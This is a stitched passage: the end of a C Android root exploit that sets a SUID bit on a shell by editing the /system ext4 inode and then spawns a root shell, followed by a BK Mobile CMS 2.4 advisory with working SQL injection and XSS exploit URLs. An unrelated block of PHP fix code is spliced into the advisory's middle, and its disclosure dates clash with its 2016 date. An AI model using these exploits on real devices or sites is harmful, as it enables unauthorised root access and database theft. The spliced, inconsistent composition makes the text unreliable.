            if( wr == modesize )
            {
                printf("[+] Success, bit SUID is setted on %s\n[+] You must reboot the device to run third step\n", SH);
            }
            else
            {
                printf("[-] Can't set bit SUID on %s\n", SH);
            }
        }
        else
        {
            printf("[-] Can't find inode!\n");
        }
        close(fd);
    }
    else
        printf("[-] Can't open %s!\n", path);

}

void third_step()
{
    char path[1024];
    //chmod(SH, 4755);
    setuid(0);
    setgid(0);
    if(getuid() == 0)
    {

        get_system_dev(path, sizeof(path));
        chmod(path, 0600);
        printf("[+] Rooted!\n");
        system(SH);
    }
    else
    {
        printf("[-] No root here!\n");
        exit(0);
    }
}

bool isSensord(char *spath)
{
    char buff[50];
    bool res = false;
    int fd = open(spath, O_RDONLY);
    if(fd != -1)
    {
        read(fd, buff, 50);
        if(strstr(buff, "/system/bin/sensord") != NULL)
        {
            res = true;
        }
        close(fd);
    }
    return res;
}

bool verify()
{
    DIR* dir;
    struct dirent *entry;
    char spath[512];
    bool res = false;
    struct stat s;

    dir = opendir("/proc");
    if(dir) {
        while ((entry = readdir(dir)) != NULL) {
            if (entry->d_type == DT_DIR) {
                snprintf(spath, 512, "/proc/%s/cmdline", entry->d_name);

                if (isSensord(spath)) {
                    stat(spath, &s);
                    if (s.st_uid == 0)
                        res = true;

                    break;
                }
            }
        }
        closedir(dir);
    }
    return res;
}

void disable_autorotate()
{
    printf("[+] Disabling auto-rotate...\n");
    system("content insert --uri content://settings/system --bind name:s:accelerometer_rotation --bind value:i:0");
}

int main(int argc, char **argv)
{

    if(argc != 2)
    {
        print_usage( argv );
        return 0;
    }

    if( strstr( argv[1], "1" ) != NULL) {
        if( verify() ) {
            disable_autorotate();
            first_step();                       //create link
        }
        else
        {
            printf("[-] It looks like it is not vulnerable!\n");
        }
    }
    else if( strstr( argv[1], "2") != NULL) {
        second_step();                          //edit ext4(/system) partition(set bit suid)
    }
    else if( strstr( argv[1], "3") != NULL) {
        third_step();                           //get root shell
    }
    else if( strstr( argv[1], "verify") != NULL){
        if( verify() )
            printf("[+] Should be vulnerable!\n");
        else
            printf("[-] Not vulnerable!\n");
    }
    else{
            print_usage( argv );
    }



    return 0;
}
            
#Product : BK Mobile CMS
#Exploit Author : Rahul Pratap Singh
#Version : 2.4
#Home page Link : http://codecanyon.net/item/jquery-mobile-website-with-full-admin-panel/2441358
#Website : 0x62626262.wordpress.com
#Linkedin : https://in.linkedin.com/in/rahulpratapsingh94
#Date : 27/Jan/2016

SQLi Vulnerability:

----------------------------------------
Description:
----------------------------------------
"g_name" parameter is not sanitized that leads to SQL Injection.

----------------------------------------
Vulnerable Code:
----------------------------------------
file: gallery1.php
line 5

$get_g_name = $_GET['g_name'];
$query_photos = "SELECT * FROM ".$get_prefix."photos WHERE gallery_name='".$get_g_name."' ORDER BY id DESC";

----------------------------------------
Exploit:
----------------------------------------
http://localhost/BKMobile%20CMS/user/gallery1.php?g_name=1%27%20union%20all%20select%201,2,3,group_concat%28version%28%29%29,5--+

----------------------------------------
POC:
----------------------------------------
https://0x62626262.files.wordpress.com/2016/01/bk-mobile-templatesqlipoc.png


XSS Vulnerability:

----------------------------------------
Description:
----------------------------------------
"g_name" parameter is not sanitized that leads to reflected XSS.

----------------------------------------
Vulnerable Code:
----------------------------------------
file: gallery1.php

line 81-88

<div data-role="page" id="<?php echo $get_g_name; ?>" class="jqm-demos"
<?php echo $custom_bg_active; ?>>

<?php include("../header.php"); ?>

<div role="main" class="ui-content">

<div class="jqm-block-content">
<h3><?php echo $_GET['g_name']; ?></h3>
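The two vulnerable spots rewritten together, added here as an example and not BK Mobile CMS code: the query at line 5 with g_name bound as a parameter, and the output at lines 81-88 with g_name escaped for the attribute and element contexts it is reflected into. $conn (a mysqli connection), $get_prefix and $custom_bg_active are assumed to exist as in the original file, the include("../header.php") line stays where it was between the two divs, and the function names are hypothetical.

```php
<?php
// Added example, not BK Mobile CMS code: the two places gallery1.php uses
// g_name, rewritten so the value is bound as a query parameter and escaped for
// each HTML context. $conn (mysqli), $get_prefix and $custom_bg_active are
// assumed to exist as in the original file; function names are hypothetical.

/** Line 5 of gallery1.php, with g_name bound instead of concatenated. */
function bk_example_load_photos( mysqli $conn, string $prefix, string $gallery_name ): array {
    // The table prefix is configuration, not request data, so it may be
    // concatenated; the gallery name never becomes part of the SQL text.
    $stmt = $conn->prepare( "SELECT * FROM `{$prefix}photos` WHERE gallery_name = ? ORDER BY id DESC" );
    $stmt->bind_param( 's', $gallery_name );
    $stmt->execute();
    $rows = $stmt->get_result()->fetch_all( MYSQLI_ASSOC ); // get_result() needs mysqlnd
    $stmt->close();
    return $rows;
}

/** One escaper for both HTML contexts on this page: ENT_QUOTES matters for the
 *  id="..." attribute, ENT_SUBSTITUTE keeps invalid UTF-8 from blanking the output. */
function bk_example_esc( string $s ): string {
    return htmlspecialchars( $s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8' );
}

/** Lines 81-88 of gallery1.php, with every reflection of g_name escaped.
 *  $custom_bg_active is the application's own attribute fragment and is assumed
 *  here to come from configuration only, as in the original file. */
function bk_example_render_gallery_header( string $g_name, string $custom_bg_active ): string {
    $safe = bk_example_esc( $g_name );
    return '<div data-role="page" id="' . $safe . '" class="jqm-demos" ' . $custom_bg_active . '>' . "\n"
         . '<div role="main" class="ui-content">' . "\n"
         . '<div class="jqm-block-content">' . "\n"
         . '<h3>' . $safe . '</h3>' . "\n";
}

/** Request side: reject oversized or control-character input before the query
 *  runs (defence in depth; the escaping above is what stops the XSS). Returns
 *  the gallery name, or null when the request should get a 400. */
function bk_example_gallery_name_from_request( array $get ) {
    $g = isset( $get['g_name'] ) && is_string( $get['g_name'] ) ? $get['g_name'] : '';
    if ( $g === '' || strlen( $g ) > 64 || preg_match( '/[\x00-\x1f\x7f]/', $g ) ) {
        return null;
    }
    return $g;
}

// Glue for gallery1.php (replaces the raw $_GET['g_name'] reads):
//   $g_name = bk_example_gallery_name_from_request( $_GET );
//   if ( $g_name === null ) { http_response_code( 400 ); exit; }
//   $photos = bk_example_load_photos( $conn, $get_prefix, $g_name );
//   echo bk_example_render_gallery_header( $g_name, $custom_bg_active );
```

With the older libmysql client, where get_result() is unavailable, bind_result() and a fetch loop do the same job. The two HTML contexts share one escaper only because both are HTML text or a double-quoted attribute; had g_name also landed inside a script block or a URL, each of those would need its own encoder.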

----------------------------------------
Exploit:
----------------------------------------
http://localhost/BKMobile%20CMS/user/gallery1.php?g_name=%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E

----------------------------------------
POC:
----------------------------------------
https://0x62626262.files.wordpress.com/2016/01/bk-mobile-templatexsspoc.png

Fix:
Update to 2.5

Vulnerability Disclosure Timeline:
→ January 14, 2015 – Bug discovered, initial report to Vendor
→ January 14, 2015 – Vendor acknowledged
→ January 19, 2015 – Vendor Deployed a Patch

#######################################
# CTG SECURITY SOLUTIONS #
# www.ctgsecuritysolutions.com #
#######################################

Pub Ref:
https://0x62626262.wordpress.com/2016/01/27/bk-mobile-cms-sqli-and-xss-vulnerability
http://codecanyon.net/item/jquery-mobile-website-with-full-admin-panel/2441358

[+] Disclaimer

Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.